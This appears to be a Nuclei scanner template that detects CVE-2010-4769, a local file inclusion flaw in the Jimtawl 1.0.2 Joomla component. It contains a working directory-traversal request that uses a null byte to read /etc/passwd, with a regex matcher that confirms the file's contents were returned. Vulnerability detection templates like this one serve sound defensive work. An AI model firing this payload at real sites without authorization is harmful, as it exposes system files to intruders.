id: CVE-2010-4769 info: name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. reference: - https://www.exploit-db.com/exploits/15585 - https://www.cvedetails.com/cve/CVE-2010-4769 - http://secunia.com/advisories/42324 - http://web.archive.org/web/20210121210048/https://www.securityfocus.com/bid/44992/ remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4769 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/17